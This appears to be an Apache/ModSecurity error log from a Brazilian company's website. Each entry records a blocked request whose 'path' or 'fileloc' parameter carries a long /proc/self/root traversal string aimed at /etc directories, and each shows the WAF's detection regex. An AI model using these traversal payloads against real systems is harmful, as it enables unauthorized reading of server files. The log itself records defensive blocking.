"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6irysWC90G-1nBrBM3gAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:51.782548 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.243.203:59098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6i_9ocpUE4ed4uDz4OwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:52.992596 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:59112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6jP9ocpUE4ed4uDz4PAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:54.140207 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:59128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6jpqj1wV0Si-Okef3AgAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:54.900353 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:48192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6jlajLEzk2WiQ-10acgAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:56.545871 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:59134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6kI6lpbStxTqkSkt0yAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:58.883100 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.243.203:59138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6kqTCbgAP5jq5TegzEAAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:00.181029 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.243.203:52580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6lKQpVkWug9HeOt89fgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:00.616431 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:34074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6lFajLEzk2WiQ-10aeAAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:02.186148 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:55008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6lqQpVkWug9HeOt89fwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:02.757068 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:52590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ltSswJuvopo3lOhnVwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:03.364108 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:55018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6l5qj1wV0Si-Okef3BQAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:04.045414 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:52602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6mI6lpbStxTqkSkt0yQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:04.689057 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:55024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6mHjZBu2q05ozVU9hTQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:06.045660 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:55030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6mqTCbgAP5jq5TegzEQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:06.232022 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:52618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6mrysWC90G-1nBrBM5AAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:07.292223 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:55046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6m6TCbgAP5jq5TegzEgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:07.544352 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:52634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6m6TCbgAP5jq5TegzFAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:09.689166 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:56628] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6nHjZBu2q05ozVU9hUQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:10.717103 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:52644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6nrABkC4fWIHEf8H3BAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:11.039807 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.241.46:56642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6n6TCbgAP5jq5TegzFwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:12.223752 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:56652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6oNSswJuvopo3lOhnWQAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
